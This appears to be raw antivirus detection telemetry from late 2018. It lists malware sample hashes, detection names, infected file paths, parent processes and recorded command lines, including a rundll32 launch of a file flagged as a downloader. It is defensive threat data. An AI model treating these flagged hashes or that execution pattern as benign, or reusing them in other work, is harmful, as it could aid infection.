  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clsid.bat', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\CLSID.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142936-f8d03e25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142936-F8D03E25', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142917-257a8382', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142917-257A8382', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142902-240cf4c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142902-240CF4C8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142109-ae2bd7a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142109-AE2BD7A9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143821-45e546f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143821-45E546F6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:38:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Profiles\\Profiles.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='of duty.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Of Duty.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Profiles\\Profiles.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='015 - silent scream [lost and found].exe', filepath='E:\\music\\music\\Vampires 652 P\\015 - SILENT SCREAM [LOST AND FOUND]\\015 - SILENT SCREAM [LOST AND FOUND].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='557536325e83b68d5f802408c6902fb34bc0a420ec5a053faffaeb5962f9dfeb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013032-27ba5ece', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_e6e2b2c5\\AVSCAN-20181102-012909-17476477\\AVSCAN-20181102-013032-27BA5ECE', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='557e7e2b852f5f84cb105fa10dd73dfd5c84eaac3a6567c5cac6b59579a690d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='light.dll', filepath='C:\\Windows\\light.dll', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='557e7e2b852f5f84cb105fa10dd73dfd5c84eaac3a6567c5cac6b59579a690d3', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T16:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='559d89a6e034af2ba3fff4fc5baaf5ef08c00fdfe8ff577c65f1d5f8cc2148d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\559D89A6E034AF2BA3FFF4FC5BAAF5EF08C00FDFE8FF577C65F1D5F8CC2148D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='559d89a6e034af2ba3fff4fc5baaf5ef08c00fdfe8ff577c65f1d5f8cc2148d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190748-0c6277f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190748-0C6277F0', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='powerdata.exe', filepath='K:\\HBCD\\Programs\\POWERDATA.EXE', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013105-ed1a5749', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013008-E1F1B96F\\AVSCAN-20181102-013105-ED1A5749', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='563533b036cd484ca3af0db629eb68d687a7e065d3bd5eb236ec6825fb1198ce', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new3ouw8mpn.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\J0DWFXI3\\new3OUW8MPN.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='563533b036cd484ca3af0db629eb68d687a7e065d3bd5eb236ec6825fb1198ce', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='563912c9c63acb40616406e0835bb88dc4aa4ec9c04a8054eac90d9f4a516d54.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\563912C9C63ACB40616406E0835BB88DC4AA4EC9C04A8054EAC90D9F4A516D54.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='563912c9c63acb40616406e0835bb88dc4aa4ec9c04a8054eac90d9f4a516d54', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='56545830ece43b47c261f391cacea26ede1436d91aa65e79db323ee3cae9e2dc.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\56545830ECE43B47C261F391CACEA26EDE1436D91AA65E79DB323EE3CAE9E2DC.VIR', filesize=512000, name='TR/Dropper.Gen.#M300.#R4954'), hash='56545830ece43b47c261f391cacea26ede1436d91aa65e79db323ee3cae9e2dc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:51:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recdisc.exe', filepath='\\\\?\\C:\\Windows\\system32\\recdisc.exe', filesize=416000, name='W32/Parite.#M1.#R1'), hash='5683b16d456ee592c57330c0e2a0453cec770378c8697d78dfbffa5581b59966', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fxc_proxyprocess.exe', filepath='C:\\Program Files\\Foxit Software\\Foxit Reader\\plugins\\Creator\\FXC_ProxyProcess.exe', filesize=140000, name='W32/Sality.AT.#M1.#R1'), hash='56a407df12fe080a9aa79631cdde0c3e2c84f18daece8a1c02f283a127352678', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T17:31:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:53:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='\\\\?\\C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='\\\\?\\C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:51:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180755-1b95cce6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13ac220b\\AVSCAN-20181101-180611-14ED7B7E\\AVSCAN-20181101-180755-1B95CCE6', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feedingfrenzy.exe', filepath='\\?\\J:\\العاب2\\السمكة 1\\FeedingFrenzy.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='56d883f54f9d360d038388653eb7f270c4210691b8975f9a1bee56b9f7b95a9e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='truckscale.exe', filepath='\\\\?\\C:\\123\\TruckScale.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='56df167b549390941f168cfcc0a6ff911cf9ee28999a64071409d32e9f0361d5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:39:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='57412b8cd0df4a722642ed3fea8b8e5223eeb57b9c7a1c3c81ce82e64c50ce92', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z9d.trd.3pp5.zjn.ztptlvt.ztlvljr.n15f.3z7zttb3', filepath='I:\\\xa0\\z9D.TrD.3PP5.Zjn.zTptlVt.ztlVLjR.n15f.3Z7zTTB3', filesize=22156000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='574b855b91fe420c719ff87bac49513b25a0e459b23a1d9ed9a4e56847e6acf2', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_wslewdurit.init', filepath='F:\\_WSLEWDURIT.init', filesize=4000, name='TR/Downloader.Gen.#M300.#R5192'), hash='578d53975c51256b7b4c6080fc46350e51f0e880a641d2151e022ad44f3958aa', metadata=Row(cmdline='_WSLEWDURIT.init,krnl jcs ddhllllddtlptcycygkgkbjxsokogogq', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:43:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A7000\\Lenovo_A7000_S233_MT6752_6.0_(by_firmwarefile.com)\\Lenovo_A7000_S233_MT6752_6.0\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='57aa8e6c7f17c5f2f2919e97e80ed839e6e24f62858582bef3ce55fcf0e32e70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:45:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A7000\\Lenovo_A7000_S233_MT6752_6.0_(by_firmwarefile.com)\\Lenovo_A7000_S233_MT6752_6.0\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='57aa8e6c7f17c5f2f2919e97e80ed839e6e24f62858582bef3ce55fcf0e32e70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:35:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\57F90F2381F560685AF89EABC0D76010A61D896B61BD5F7B5BD0E6C2DF619E02', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Program Files (x86)\\Autodesk\\Backburner\\server.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='5808b1f3fde8f0c4efbe55a835c3b8fdd8d44f7849f16bff22dc2643bfe1e107', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Program Files (x86)\\Autodesk\\Backburner\\server.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='5808b1f3fde8f0c4efbe55a835c3b8fdd8d44f7849f16bff22dc2643bfe1e107', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063457-c422caf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be769b8a\\AVSCAN-20181101-063327-B4BA4006\\AVSCAN-20181101-063457-C422CAF8', filesize=832000, name='HEUR/AGEN.1035486.#M1.#R1'), hash='5890aa5913029b55ee7100865dd3e543f169ce1b9fc1d7557decf16cde38a924', metadata=Row(cmdline=None, country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agglglobalhistory.exe', filepath='C:\\Users\\X\\Downloads\\Chekeadores Netflix\\X-Slayer Checker Pack\\X-Slayer Checker Pack\\Steam Accounts Checker By X-SLAYER\\AgGlGlobalHistory.exe', filesize=832000, name='HEUR/AGEN.1035486.#M1.#R1'), hash='5890aa5913029b55ee7100865dd3e543f169ce1b9fc1d7557decf16cde38a924', metadata=Row(cmdline='EULA', country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\esetonlinescanner_esl.exe', parentsize=6986872, timestamp='2018-11-01T07:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wa.xls', filepath='\\\\sango04\\rheology\\INA\\INA-Backup\\Dtina-mbi-wa\\WA.XLS', filesize=192000, name='X2000M/Laroux.B.#M1.#R1'), hash='58aeb835d15e94e4af50fa2805e63806c1c586cb5cac86067cdf28ab0d2c21f2', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674360, timestamp='2018-11-01T07:55:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152452-84249a9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-152358-7BAB3610\\AVSCAN-20181101-152452-84249A9C', filesize=192000, name='X2000M/Laroux.B.#M1.#R1'), hash='58aeb835d15e94e4af50fa2805e63806c1c586cb5cac86067cdf28ab0d2c21f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\Decimation - Realistic Zombie Apocalypse Modpack Modpack 0.82f\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='58cdef157dc3c20a83886f5457e2146c948a5626b599e5cf9761227174740287', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T15:40:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004b1a', filepath='C:\\Windows\\Temp\\tmp00001e74\\tmp00004b1a', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='58e3a43b823697e29db6ec2a35c2d145179ed2bef7b22e7e0cd272f865578e52', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T19:16:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000caed', filepath='C:\\Windows\\Temp\\95c929e7-baf7-47af-b9cb-63ddd1210adc\\tmp00000149\\tmp0000caed', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='5904e3663498a9091653914d3c086c33930f9bafbd9e4c2f74d1b134c279fd78', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.10.767.8917\\AdAwareService.exe', parentsize=712432, timestamp='2018-11-01T11:12:01Z'), dt=datetime.date(2018, 11, 1)),
